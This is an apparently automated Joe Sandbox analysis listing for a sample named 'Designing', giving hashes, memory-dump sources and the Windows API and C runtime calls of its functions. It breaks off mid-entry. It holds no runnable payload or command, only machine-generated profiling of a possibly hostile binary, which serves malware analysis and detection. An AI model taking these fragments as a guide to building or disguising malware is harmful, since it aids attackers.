                                              • Opcode ID: d245cfe0c1529138e3a3f0451d371620af117a57046648d408f5d2b800a101e6
                                              • Instruction ID: 1b1a41c2c5db04bab93277c2f79c2009d959a11eded18c555038e964c81279dd
                                              • Opcode Fuzzy Hash: d245cfe0c1529138e3a3f0451d371620af117a57046648d408f5d2b800a101e6
                                              • Instruction Fuzzy Hash: 87F0A47550421DA6CB21BA58EC15FDE7BECDF05752F5048E9FC14A2291DFB18B88C6E0
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: f43934d88fecf322053c4b75f33f135173a71f8ae8606d2d75ede3917c8003d6
                                              • Instruction ID: 7c1f7b998e229d02335a6b2874943c8298ef2364d1af1b267c2d967a8c064816
                                              • Opcode Fuzzy Hash: f43934d88fecf322053c4b75f33f135173a71f8ae8606d2d75ede3917c8003d6
                                              • Instruction Fuzzy Hash: 52017571800748EBCF21AF658C01B9E7BE1AF50363F1441D5BC14671A1DB318616DB91
                                              APIs
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • __lock_file.LIBCMT ref: 00B5560B
                                                • Part of subcall function 00B56E3E: __lock.LIBCMT ref: 00B56E61
                                              • __fclose_nolock.LIBCMT ref: 00B55616
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 388dc836909c192636f315383a711d5802497db2287c16a75129c059d059329e
                                              • Instruction ID: 61983b05ad17f9f024b4a016866c0ce11abd32942bcd8a7dafea055aa1d0f6c9
                                              • Opcode Fuzzy Hash: 388dc836909c192636f315383a711d5802497db2287c16a75129c059d059329e
                                              • Instruction Fuzzy Hash: 58F024B1802B449AD7306B359C1276E77E16F10333F2182C9AC24BB1C1DF7C4A098F51
                                              APIs
                                              • __lock_file.LIBCMT ref: 00B55EB4
                                              • __ftell_nolock.LIBCMT ref: 00B55EBF
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2999321469-0
                                              • Opcode ID: 2d26c415307dba10be5253e89eb5408c4f64094b5fcb1ed6370f6b5beebe60cf
                                              • Instruction ID: c0f3e87b21ba92468101681654a392421233c33bedc5f4b664b2fc61ee9ba9ad
                                              • Opcode Fuzzy Hash: 2d26c415307dba10be5253e89eb5408c4f64094b5fcb1ed6370f6b5beebe60cf
                                              • Instruction Fuzzy Hash: 83F0A0719116159ADB20BB74880375E76E06F05333F2142C6AC24BB1D2CFB88E4A9A91
                                              APIs
                                              • _memset.LIBCMT ref: 00B45AEF
                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B45B1F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell__memset
                                              • String ID:
                                              • API String ID: 928536360-0
                                              • Opcode ID: 5f526f8ee1de3c4b88b195b3dc127e5e987433d3b87857f560cade5b938b33b1
                                              • Instruction ID: b69584cbb22c0b8e311f9749e8ccd67d61f61fee6fae313eb2da5afacab86859
                                              • Opcode Fuzzy Hash: 5f526f8ee1de3c4b88b195b3dc127e5e987433d3b87857f560cade5b938b33b1
                                              • Instruction Fuzzy Hash: 40F0A7708183089FD7A29F24DC497A677BC9701308F0001EAFA4897292DF714B98CF91
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadString$__swprintf
                                              • String ID:
                                              • API String ID: 207118244-0
                                              • Opcode ID: a85bfe6de5dfbc1a69bd69403bd43fc23c20758db532f3fd19d6b5452556fc88
                                              • Instruction ID: 17dfe625decfdd5a2ff8cdb9ecfe647c870539c826737974c3b0f6f71dfb4886
                                              • Opcode Fuzzy Hash: a85bfe6de5dfbc1a69bd69403bd43fc23c20758db532f3fd19d6b5452556fc88
                                              • Instruction Fuzzy Hash: 77B13C34E0410AAFCF14EF98D8919EDBBF5FF59710F24809AF915AB291DB30AA41CB50
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                              • Instruction ID: 1ad34b53d6d9613bc8092bfce9533430589883268cbdf92446677ba648d3145b
                                              • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                              • Instruction Fuzzy Hash: 8961CF70600206DFDB20DF54C881B7AB7E9EF44310F3582ADE89AAB291D775ED81CB51
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58bd48562970cca933c86c48be757e10ac83bbcabcd2967da65c87250b2c4e5a
                                              • Instruction ID: 1978ecce10b9b43e8a9bcd308d84c62d8bbc5338f65cacf0d91f05840dbdadfc
                                              • Opcode Fuzzy Hash: 58bd48562970cca933c86c48be757e10ac83bbcabcd2967da65c87250b2c4e5a
                                              • Instruction Fuzzy Hash: C75161356006049BCF24EB68C991F6E77E5EF45710F2885E8F81AAB392CB70EE05DB51
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                              • Instruction ID: 6df1aec9ef1e0c174b1bd59d6ff6e3e2a2e71f7874feffa1f4ca69024908b3f7
                                              • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                              • Instruction Fuzzy Hash: 7C31A179604602DFD724DF18D490A65F7E0FF08720718C5E9E98A8B791D730EE81DB94
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B441B2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: e75c3dcf11f2698fdad44a0206f6a45ef1dd39bc3c9a54d67968cc840c63fef1
                                              • Instruction ID: 21e9e031a6f7f3c719b8879923ed00f56691ce2cd74ac001a150de730174b268
                                              • Opcode Fuzzy Hash: e75c3dcf11f2698fdad44a0206f6a45ef1dd39bc3c9a54d67968cc840c63fef1
                                              • Instruction Fuzzy Hash: F5313C71A00616AFDB18DF6DC880B5DBBF5FF58310F148659E815A3710D770AAA4DB90
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 17cd48199414a02777d8652e3e520d72cb631f64d891fc9572ca111d17b78aee
                                              • Instruction ID: 205de5ec7c5dd00c13fbacf23b4c5f3b1ad45349fbe69a5dd84e1e62b2abc27a
                                              • Opcode Fuzzy Hash: 17cd48199414a02777d8652e3e520d72cb631f64d891fc9572ca111d17b78aee
                                              • Instruction Fuzzy Hash: 4C410674508341DFDB24DF18C484B1ABBE1FF45318F1988ACE9999B362C375E885CB92
                                              APIs
                                                • Part of subcall function 00B44B29: FreeLibrary.KERNEL32(00000000,?), ref: 00B44B63
                                                • Part of subcall function 00B5547B: __wfsopen.LIBCMT ref: 00B55486
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00B427AF,?,00000001), ref: 00B449F4
                                                • Part of subcall function 00B44ADE: FreeLibrary.KERNEL32(00000000), ref: 00B44B18
                                                • Part of subcall function 00B448B0: _memmove.LIBCMT ref: 00B448FA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: d53bbbb78f96f33a31f7923479e886fbac96eaa6ed46007a2a27c82944df5726
                                              • Instruction ID: 55fd97407f6413be5edfb25ee7b6bd0b9abf834d5ec25883e9889890d68e8e43
                                              • Opcode Fuzzy Hash: d53bbbb78f96f33a31f7923479e886fbac96eaa6ed46007a2a27c82944df5726
                                              • Instruction Fuzzy Hash: 92112732650205ABDB10FB74CC06FAE73E9EF40701F1044ADF541A6191EFB08B25B795
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: db82fa23415eb7e19fa93cded163cd2c30fa7975a8d1a54e70cfa6c6176bd8e9
                                              • Instruction ID: 9941dff5f3f979c43a9e4e6794a09b2eaf2a2a905d751e27a426f38826afb478
                                              • Opcode Fuzzy Hash: db82fa23415eb7e19fa93cded163cd2c30fa7975a8d1a54e70cfa6c6176bd8e9
                                              • Instruction Fuzzy Hash: 3B21F374508341EFDB24DF54C484B1ABBE1BF88304F1989ACF88A57362D731E849CB92
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00B43CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B44276
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: ce2d7241530621acabaa8524ae72e7ef9c039d9d1a0e7de33c53b1fc5558118f
                                              • Instruction ID: 71634e54d455b6322743e10dd2f35d955142277125482d5cedb3ee36e81109bb
                                              • Opcode Fuzzy Hash: ce2d7241530621acabaa8524ae72e7ef9c039d9d1a0e7de33c53b1fc5558118f
                                              • Instruction Fuzzy Hash: 16113A312107019FE720CF55C480B62B7F5FF88750F14C96DE8AA86A50D7B0EA55EB60
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00BA4998
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID:
                                              • API String ID: 1431749950-0
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • _memset.LIBCMT ref: 00B97CB4
                                              Similarity
                                              • API ID: Exception@8Throw_memsetstd::exception::exception
                                              • String ID:
                                              • API String ID: 525207782-0
                                              APIs
                                              Similarity
                                              • API ID: _fseek
                                              • String ID:
                                              • API String ID: 2937370855-0
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,?,00B427AF,?,00000001), ref: 00B44A63
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              APIs
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B509E4
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B94D31
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Similarity
                                              • API ID: FolderPath_memmove
                                              • String ID:
                                              • API String ID: 3334745507-0
                                              APIs
                                                • Part of subcall function 00B9384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00B93959,00000000,00000000,?,00B805DB,00BE8070,00000002,?,?), ref: 00B938CA
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,00000000,00000000,?,00B805DB,00BE8070,00000002,?,?,?,00000000), ref: 00B93967
                                              Similarity
                                              • API ID: File$PointerWrite
                                              • String ID:
                                              • API String ID: 539440098-0
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00B72F8B), ref: 00B442EF
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              APIs
                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00B93E7D,?,?,?), ref: 00B93F0D
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00B806E6,00000000,00000000,00000000), ref: 00B442BF
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              APIs
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00B9D842
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              APIs
                                                • Part of subcall function 00B94005: FindFirstFileW.KERNELBASE(?,?), ref: 00B9407C
                                                • Part of subcall function 00B94005: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00B940CC
                                                • Part of subcall function 00B94005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B940DD
                                                • Part of subcall function 00B94005: FindClose.KERNEL32(00000000), ref: 00B940F4
                                              • GetLastError.KERNEL32 ref: 00B9C292
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
                                              • Opcode ID: a75c607fc76562b776e12ec6d30053355dc480d473c34cf1f1f4fe52f5a07329
                                              • Instruction ID: d6d40b6f0071eeb1e5053e75db5e420f3871a73ea6016366df249e64d2396203
                                              • Opcode Fuzzy Hash: a75c607fc76562b776e12ec6d30053355dc480d473c34cf1f1f4fe52f5a07329
                                              • Instruction Fuzzy Hash: 31F0A0322102108FCB14EF59D850F6AB7E5EF89320F0580A9F9098B352CB70BC02CB94
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BBD208
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BBD249
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00BBD28E
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BBD2B8
                                              • SendMessageW.USER32 ref: 00BBD2E1
                                              • _wcsncpy.LIBCMT ref: 00BBD359
                                              • GetKeyState.USER32(00000011), ref: 00BBD37A
                                              • GetKeyState.USER32(00000009), ref: 00BBD387
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BBD39D
                                              • GetKeyState.USER32(00000010), ref: 00BBD3A7
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BBD3D0
                                              • SendMessageW.USER32 ref: 00BBD3F7
                                              • SendMessageW.USER32(?,00001030,?,00BBB9BA), ref: 00BBD4FD
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BBD513
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BBD526
                                              • SetCapture.USER32(?), ref: 00BBD52F
                                              • ClientToScreen.USER32(?,?), ref: 00BBD594
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BBD5A1
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BBD5BB
                                              • ReleaseCapture.USER32 ref: 00BBD5C6
                                              • GetCursorPos.USER32(?), ref: 00BBD600
                                              • ScreenToClient.USER32(?,?), ref: 00BBD60D
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BBD669
                                              • SendMessageW.USER32 ref: 00BBD697
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BBD6D4
                                              • SendMessageW.USER32 ref: 00BBD703
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BBD724
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BBD733
                                              • GetCursorPos.USER32(?), ref: 00BBD753
                                              • ScreenToClient.USER32(?,?), ref: 00BBD760
                                              • GetParent.USER32(?), ref: 00BBD780
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BBD7E9
                                              • SendMessageW.USER32 ref: 00BBD81A
                                              • ClientToScreen.USER32(?,?), ref: 00BBD878
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BBD8A8
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BBD8D2
                                              • SendMessageW.USER32 ref: 00BBD8F5
                                              • ClientToScreen.USER32(?,?), ref: 00BBD947
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BBD97B
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBDA17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 3977979337-4164748364
                                              • Opcode ID: f5ce2e361e75ae10f02854c16d0b711645c1cc9ea029c543ac5e0a04ab030b5d
                                              • Instruction ID: 3db9de4396dc41bbc2b47c1679f3c5a2ef4323b23ef2213eafed00974a8d3fa6
